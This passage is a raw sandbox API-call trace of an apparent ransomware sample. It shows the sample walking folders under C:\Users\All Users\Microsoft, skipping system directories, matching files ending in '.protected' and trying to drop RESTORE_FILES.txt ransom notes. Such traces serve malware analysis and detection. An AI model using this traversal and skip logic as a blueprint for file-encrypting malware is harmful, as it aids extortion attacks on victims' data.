(lpString1="..", lpString2="Windows") returned -1 [0093.180] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.180] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.180] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.180] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\..") returned 38 [0093.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.181] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="Program Files") returned -1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="Program Files (x86)") returned -1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="Active.GRL.protected", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL.protected") returned 56 [0093.181] StrStrIW (lpFirst="Active.GRL.protected", lpSrch=".protected") returned=".protected" [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="Program Files") returned -1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="Program Files (x86)") returned -1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="Pending.GRL.protected", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.protected") returned 57 [0093.181] StrStrIW (lpFirst="Pending.GRL.protected", lpSrch=".protected") returned=".protected" [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.181] 
lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\RESTORE_FILES.txt") returned 53 [0093.181] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.181] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.181] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\RESTORE_FILES.txt") returned 53 [0093.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\mf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.181] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="Windows") returned -1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="Program Files") returned -1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="Program Files (x86)") returned -1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x47e9d8, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN") returned 37 [0093.181] lstrcmpW (lpString1="MSDN", lpString2=".") returned 1 [0093.181] lstrcmpW (lpString1="MSDN", lpString2="..") returned 1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*") returned 39 [0093.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.184] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.184] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.184] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.184] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.184] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.184] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\.") returned 39 [0093.184] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.184] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.184] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.184] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.184] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.184] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.184] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.184] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\..") returned 40 [0093.184] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.184] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.184] FindNextFileW (in: 
hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.184] lstrcmpiW (lpString1="8.0", lpString2="Windows") returned -1 [0093.184] lstrcmpiW (lpString1="8.0", lpString2="Program Files") returned -1 [0093.185] lstrcmpiW (lpString1="8.0", lpString2="Program Files (x86)") returned -1 [0093.185] lstrcmpiW (lpString1="8.0", lpString2="$Recycle.bin") returned 1 [0093.185] lstrcmpiW (lpString1="8.0", lpString2="System Volume Information") returned -1 [0093.185] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0") returned 41 [0093.185] lstrcmpW (lpString1="8.0", lpString2=".") returned 1 [0093.185] lstrcmpW (lpString1="8.0", lpString2="..") returned 1 [0093.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*") returned 43 [0093.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.185] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.185] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.185] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.185] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.185] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\.") returned 43 [0093.185] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.185] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.186] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.186] 
lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.186] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.186] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\..") returned 44 [0093.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.186] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt") returned 59 [0093.186] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.186] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.186] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.186] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt") returned 59 [0093.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all 
users\\microsoft\\msdn\\8.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.186] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.186] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\RESTORE_FILES.txt") returned 55 [0093.187] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.187] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.187] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.187] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.187] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\RESTORE_FILES.txt") returned 55 [0093.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.188] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.188] lstrcmpiW 
(lpString1="NetFramework", lpString2="Windows") returned -1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files") returned -1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files (x86)") returned -1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="$Recycle.bin") returned 1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="System Volume Information") returned -1 [0093.188] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned 45 [0093.188] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1 [0093.188] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1 [0093.188] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*") returned 47 [0093.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.188] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.188] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.188] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.188] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.188] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.189] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\.") returned 47 [0093.189] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.189] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.189] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.189] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.189] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0093.189] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.189] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.189] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\..") returned 48 [0093.189] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.189] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.189] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Windows") returned -1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files") returned -1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files (x86)") returned -1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="$Recycle.bin") returned 1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="System Volume Information") returned -1 [0093.189] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned 61 [0093.189] lstrcmpW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0093.189] lstrcmpW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0093.189] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned 63 [0093.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.190] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.190] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.190] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0093.190] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\.") returned 63 [0093.190] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\..") returned 64 [0093.190] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.190] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt") returned 79 [0093.190] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.190] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.190] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt") returned 79 [0093.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0093.190] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.190] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\RESTORE_FILES.txt") returned 63 [0093.190] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.190] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.191] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.191] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\RESTORE_FILES.txt") returned 63 [0093.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.191] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 
[0093.191] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0093.191] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned 40 [0093.191] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0093.191] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*") returned 42 [0093.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.192] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.192] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.192] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.192] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.192] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\.") returned 42 [0093.192] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.192] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.192] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.192] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.192] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.192] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.192] lstrcmpiW (lpString1="..", lpString2="System Volume Information") 
returned -1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\..") returned 43 [0093.192] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.192] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.192] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 52 [0093.192] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0093.192] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0093.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*") returned 54 [0093.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.193] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.193] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.193] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.193] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.193] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\.") returned 54 [0093.193] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.193] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.193] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.193] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.193] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.193] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.193] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\..") returned 55 [0093.193] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.193] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.193] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.193] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.193] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.194] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.194] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.194] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 70 [0093.194] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.194] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.194] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: 
